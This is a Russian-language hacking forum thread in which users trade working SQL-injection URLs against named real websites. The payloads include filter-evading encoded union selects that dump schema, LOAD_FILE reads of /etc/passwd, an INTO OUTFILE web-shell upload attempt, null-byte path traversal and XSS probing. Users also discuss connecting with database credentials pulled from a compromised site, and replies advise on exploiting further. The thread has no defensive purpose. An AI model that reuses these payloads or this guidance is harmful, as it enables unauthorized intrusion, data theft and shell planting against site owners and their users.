Подобрал колличество полей. Вылезло Forbidden можно как то обойти?) _http://philshopping.com/product_info.php?id=302+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13--
http://philshopping.com/product_info.php?id=302+and+1=0+union(select+1,2,3,4,5,6,7,8,9,10,11,12,13)+--+
Через Php-injection вытащил dbconfig.php $dbhost="localhost"; Пробую подключиться, вместо localhost пишу ip домена. К базе подключаеться , а вот mysql_connect_db не работает В чем может быть проблемма? спасибо
Не получается вывести определенное поле из таблицы MySQL. Причем поле довольно странное. 1234 1234 0 Пробовал AES_(EN/DE)CRYPT, HEX - на страницу ничего не выводится.
если пытаешься удоленно подключиться, то часто бывает что отключена функция удаленного в mysql, попробуй поискать phpmyadmin или cpanel, от туда и пытайся зайти...
на сайте в поиске ввожу "/XSS/?> оно мне выдает найдено 0 записей по запросу '\"/XSS/?>' подставляю еще ' выдает тоже самое только '\'\\\"/XSS/?>' подставляю еще ' выходит '\'\\\'\\\\\\\"/XSS/?>' и после этого когда я подставляю ' выдает результат поиска Оо - первых 20 записей категории XSS ?
ты вообще читаешь что оно тебе написало? select id from phpshop_categories where seoname='-3'/**//*!union*//**//*!select*//**/version(),1,2,3,4,5,6--+'' limit 1
есть ли русский фак по nikto 2? самому сложновато разобраться прописую например perl nikto.pl -h 91.20*.***.94 сканирует только директории и файлы. Что прописывать например для обнаружения sql или php inj? (Ubuntu)
и stasiliy можна так Code: http://www.onlymelbourne.com.au/melbourne.php?id=371+%61nd+1=0+%75nion+%73elect+(%73elect(@x)%66rom(%73elect(@x:=0x00),(%73elect(null)%66rom(%69nformation_schema.%63olumns)%77here (%74able_schema!=0x696e666f726d6174696f6e5f736368656d61)%61nd(0x00)%69n (@x:=%63oncat(@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,%63olumn_name))))x) пс:убрать пробели
Доброго времени суток уважаемые, Есть вопрос: 1. Эксплуатирую одну очень важную blind inj. Пользователь, из под которого запущена БД привилегированный, т.е. имеет права FILE_PRIV = Y, INSERT_PRIV = Y и тд.. При использовании конструкции Code: SELECT LOAD_FILE('/etc/passwd') я могу получить список из passwd, и ничего кроме /etc/passwd я прочитать не могу.. Могу ли я читать что нибудь кроме passwd, в той же /etc/ или в любом другом каталоге? Если да, то у меня не выходит.. Читает только /etc/passwd... Может кто нибудь объяснить? З.Ы: БД, запросы к которой я посылаю, находится на другом серве, т.е. не на том же сервере что сам сайт. 1.1. Возможно ли как нибудь узнать, каков IP адрес у этого сервера с MySQL ? 2. Пытаюсь залить веб шелл, не выходит. Code: SELECT '<?php phpinfo(); ?>' FROM mysq.user INTO OUTFILE '/rdb-cluster/sites/somesite.com/htdocs/images/info.php' АХТУНГ, вопрос: Выполняя запрос на заливку шелла, я указываю веб путь на сервере с MySQL или же тот, где используется сценарий? А если MySQL поднят на машине, где вообще нет веб директорий.. То бишь апачи не поднят.. Я так понимаю про шелл через скулю забыть? Если же веб путь указывать надо на сервере с апачи, то вот: FILE_PRIV = Y Full path взятый из phpinfo самого сайта = /rdb-cluster/sites/somesite.com/htdocs/ По адресу foo.somesite.com/.svn/ я нашел исходники, в которых подключались конфиги с подключением к БД: PHP: include('/data/vhosts/www.somesite.com/htdocs/inc/conf.php') То бишь: /data/vhosts/www.somesite.com/htdocs/ Из файла entries в той же /.svn/, я выдернул следующую запись: /home/user/websites/foo.somesite.com/ ..... Я немного запутался, и голова идет кругом, подскажите пожалуйста, откуда столько путей? Какой из них "тот самый" ? С уважением, надеюсь кто нибудь поможет!
support/button.php?image=asdasd Получаю ошибку Warning: fopen(locales/ru/button/asdasd_off.gif) [function.fopen]: failed to open stream: No such file or directory in [patch]\support\button.php on line 27 no image Я так понимаю это пхп инекция? Как её заюзать? Сервер на винде.
Нет, это не пхп инъекция. Можешь использовать для XSS. Возможно, получится читать файлы на сервере. Например так: support/button.php?image=../../../../../../../[patch]/support/button.php%00
ne0k 1. Какие еще файлы ты пытался читать? 1.1. Почитать скрипты, которые обращаются к БД 2. На сервере с MySQL
INTO OUTFILE и INTO DUMPFILE обязательно требуют кавычек. В обычных условиях залить ничего не получится. Но исключения бывают, все зависит от конкретного случая.
Спасибо, добрый человек. Но что не работает. Делаю вот так support/button.php?image=../../../../../../../C:/Server/home/localhost/support/button.php%00. Получаю "Wrong parameter used or absent: image" Что не так? XSS на этом сайтике чёртова куча, но толк от них, если там даже админки нету.
